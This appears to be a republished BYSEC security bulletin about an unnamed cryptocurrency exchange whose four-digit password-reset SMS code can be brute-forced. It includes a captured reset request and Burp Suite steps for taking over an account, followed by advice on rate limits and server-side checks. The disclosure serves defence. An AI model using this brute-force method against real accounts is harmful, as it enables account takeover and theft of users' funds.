BYSEC安全快報:交易所出現邏輯漏洞,用戶資產遭受威脅區塊鏈
日前,知名區塊鏈安全團隊BYSEC發現一交易所的邏輯漏洞。據分析,研究人員可以通過暴力破解并且修改賬戶密碼。
日前,知名區塊鏈安全團隊BYSEC發現一交易所的邏輯漏洞。據分析,黑客可以通過暴力破解并且修改賬戶密碼。
旨在保證交易所的資金安全,督促其及時修復漏洞,BYSEC將披露此漏洞以及黑客的攻擊手法,并提供安全建議,望各大交易所防患于未然。
一:登陸賬號(以自己賬號為例),并找回驗證碼
在找回密碼的地方,同樣由于驗證碼只有四位,且有效期并不是短信所說的五分鐘,可對驗證碼進行暴力破解。
找回密碼的地方發送驗證碼后抓包
POST /index.php/index/login/findpwd.html HTTP/1.1
Host: www.xxx.com
Content-Length: 119
Accept: */*
Origin: http://www.xxx.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.xx/index.php/index/login/findpwd.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=163c8a60f6159c-0b4bd043eec36-5e183017-13c680-163c8a60f626f9; parent_qimo_sid_e9218490-6333-11e8-a3c9-b1478a226697=35fdda40-67c4-11e8-83e4-79a21b6dfa62; accessId=e9218490-6333-11e8-a3c9-b1478a226697; pageViewNum=47; UM_distinctid=163c995bcfe252-0d945e09fb268f-5e183017-13c680-163c995bcff46f; bad_ide9218490-6333-11e8-a3c9-b1478a226697=ee01da81-679f-11e8-823a-23b1a05aa1d6; PHPSESSID=l1qlol0kf3fnja716emjaotf90; CNZZDATA1273849067=1079089793-1528075768-|1528101117; names=4015pF5qhMZgbLFCCuwQtNG2VYYlyMnhmmNUSRlT9HIhwDyDUD1rxxryXPM1
Connection: close
userType=1&userName=1381&countryCode=+86&smsCode=4314&imgCode=gkc&newPassword=123456qwe&newPasswords=123456qwe
這里用自己的賬號進行測試,針對四位驗證碼smsCode進行爆破
成功爆破出四位驗證碼然后重置密碼
二:使用Burp Suite工具成功爆破出四位驗證碼,重置密碼為123456qwe (重置前密碼是123456ttt)
三、和手機收到的驗證碼一致
四、利用重置的密碼成功登錄賬戶
對此,BYSEC對廣大交易所提出安全建議:
1、添加驗證碼機制,加入圖片(驗證碼動態生成且滿足隨機性)或者短信驗證碼(驗證碼具備超時時限一般為1分鐘,且在該時限內錯誤次數超過3次則進行鎖定1分鐘后方能重新獲取驗證碼,超時后驗證碼自動失效)!
2、驗證碼必須在服務器端進行校驗,客戶端的一切校驗都是不安全的!
1.TMT觀察網遵循行業規范,任何轉載的稿件都會明確標注作者和來源;
2.TMT觀察網的原創文章,請轉載時務必注明文章作者和"來源:TMT觀察網",不尊重原創的行為TMT觀察網或將追究責任;
3.作者投稿可能會經TMT觀察網編輯修改或補充。
